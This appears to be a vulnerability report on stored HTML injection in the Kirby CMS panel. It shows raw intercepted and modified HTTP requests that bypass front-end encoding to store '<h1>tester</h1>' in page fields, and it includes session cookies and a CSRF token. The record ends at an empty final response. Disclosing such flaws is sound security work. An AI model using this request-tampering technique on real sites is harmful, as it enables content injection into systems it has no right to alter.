The tester discovered that HTML code injection into the webpage was possible. Although the front-end typically encodes the payload by default, the tester found that by intercepting the request and modifying it to include the original HTML code, the HTML injection was successfully executed upon a successful request.
Original Request :
POST /BGZUwFZY/api/pages/microsite HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=910521efece58be7ce81f24f7c2b5978f21a791a%2B1707762274.dd8b11107e02a3859af3.2da7b8302b8e19193900caedabf370a68d674e23f80cf58135327d573242604b; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F; snipcart-cart=37440eed-2a09-4ed3-b534-515b00f4301c
Content-Length: 371
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
X-Language: null
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
X-Http-Method-Override: PATCH
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: <https://trykirby.com>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: empty
Referer: <https://trykirby.com/BGZUwFZY/panel/pages/microsite?tab=content>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"text":"**<p><h1>tester</h1></p>**"},"id":"970d3d93-f87c-4a36-a912-018a262e3b1d","isHidden":false,"type":"text"}],"id":"4007332a-999e-4aa2-966b-53ddc76b0ae2","width":"1/1"}],"id":"36dc9245-8867-4f8a-b2cd-2496d3998ffa"}],"description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"}
Modified Request :
POST /BGZUwFZY/api/pages/microsite HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=910521efece58be7ce81f24f7c2b5978f21a791a%2B1707762274.dd8b11107e02a3859af3.2da7b8302b8e19193900caedabf370a68d674e23f80cf58135327d573242604b; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F; snipcart-cart=37440eed-2a09-4ed3-b534-515b00f4301c
Content-Length: 352
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
X-Language: null
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
X-Http-Method-Override: PATCH
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: <https://trykirby.com>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: empty
Referer: <https://trykirby.com/BGZUwFZY/panel/pages/microsite?tab=content>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"text":"**<h1>tester</h1>**"},"id":"970d3d93-f87c-4a36-a912-018a262e3b1d","isHidden":false,"type":"text"}],"id":"4007332a-999e-4aa2-966b-53ddc76b0ae2","width":"1/1"}],"id":"36dc9245-8867-4f8a-b2cd-2496d3998ffa"}],"description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"}
Response :
HTTP/1.1 200 OK
Date: Mon, 12 Feb 2024 17:02:32 GMT
Server: Apache
Cache-Control: no-store, private
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Content-Length: 874
Connection: close
Content-Type: application/json; charset=UTF-8
{"code":200,"data":{"content":{"modules":[{"attrs":[],"columns":[{"blocks":[{"content":{"text":"<h1>tester<\\/h1>"},"id":"970d3d93-f87c-4a36-a912-018a262e3b1d","isHidden":false,"type":"text"}],"id":"4007332a-999e-4aa2-966b-53ddc76b0ae2","width":"1\\/1"}],"id":"36dc9245-8867-4f8a-b2cd-2496d3998ffa"}],"title":"Microsite","description":"Representative one-pagers for your product","uuid":"VZlscZfc8c5gEiwM"},"id":"microsite","num":6,"options":{"access":true,"changeSlug":false,"changeStatus":false,"changeTemplate":false,"changeTitle":false,"create":true,"delete":false,"duplicate":false,"list":true,"move":true,"preview":true,"read":true,"sort":true,"update":true},"parent":null,"slug":"microsite","status":"listed","template":"microsite","title":"Microsite","url":"https:\\/\\/trykirby.com\\/BGZUwFZY\\/microsite","uuid":"page:\\/\\/VZlscZfc8c5gEiwM"},"status":"ok","type":"model"}
Request :
POST /BGZUwFZY/api/pages/home HTTP/1.1
Host: trykirby.com
Cookie: kirby_session=910521efece58be7ce81f24f7c2b5978f21a791a%2B1707762274.dd8b11107e02a3859af3.2da7b8302b8e19193900caedabf370a68d674e23f80cf58135327d573242604b; instance=410dd31498585dbf2529a45d1da40600f8a7c87c%2Bhttps%3A%2F%2Ftrykirby.com%2FBGZUwFZY%2F; snipcart-cart=37440eed-2a09-4ed3-b534-515b00f4301c
Content-Length: 181
Sec-Ch-Ua: "Not A(Brand";v="99", "Microsoft Edge";v="121", "Chromium";v="121"
X-Language: null
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
Content-Type: application/json
X-Csrf: dffaa6b125814485f872c3bfb34fa828d0bdbb5597fa0cbfcd8306bf6f302683
X-Http-Method-Override: PATCH
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: <https://trykirby.com>
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: same-origin
Sec-Fetch-Dest: empty
Referer: <https://trykirby.com/BGZUwFZY/panel/pages/home>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"heading":"<h1>tester</h1>","panelheading":"<h1>tester</h1>","aboutheading":"<h1>tester</h1>","paneltext":"<h1>tester</h1>","abouttext":"<h1>tester</h1>","uuid":"VP6AN8HYZDCLorHB"}
Response :